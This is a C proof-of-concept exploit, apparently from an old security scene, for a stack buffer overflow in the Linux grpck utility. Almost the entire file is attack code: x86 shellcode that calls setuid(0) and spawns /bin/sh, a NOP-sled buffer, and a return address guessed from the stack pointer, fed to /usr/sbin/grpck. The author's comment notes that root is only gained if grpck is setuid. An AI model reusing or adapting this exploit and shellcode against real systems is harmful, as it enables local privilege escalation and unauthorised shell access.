/* GRPCK-exploit by bob
 *  
 * This code is proof-of-concept.
 * 
 * By default grpck is not setuid, so
 * you can not get root privileges from
 * this exploit.
 *
 * I did not FIND this exploit,
 * This exploit is to be used in conjunction
 * with bofs4kidsPII.txt
 *
 * bob@dtors.net
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

char shellcode[] = 
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" //setuid 0
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";


unsigned long get_sp(void) 

{
 __asm__("movl %esp, %eax");
}

int main(int argc, char **argv) {

  int bsize  = 2188;
  

  unsigned long addr;
  char *buff;
  int i;

  if (bsize % 4 != 0) {

  bsize = bsize + 4 - (bsize % 4); } 

  buff  = (char *)malloc(bsize);
  addr  = get_sp(); 
  
    fprintf(stderr, "( ( g r p c k - e x p l o i t ) )\n"); 
    fprintf(stderr, "         b y  - b o b\n\n");
    fprintf(stderr, "Return Address: 0x%x\n", addr);
    fprintf(stderr, "Buffer Size: %d\n", bsize);
    

  for(i = 0; i < bsize; i++) 
	{
      	*(long *)&buff[i] = 0x90;
	}
  *(long *)&buff[bsize - 4] = addr;
memcpy(buff + bsize - strlen(shellcode) - 8, shellcode, strlen(shellcode));


  execl("/usr/sbin/grpck", "grpck", buff, NULL);

return 0;
}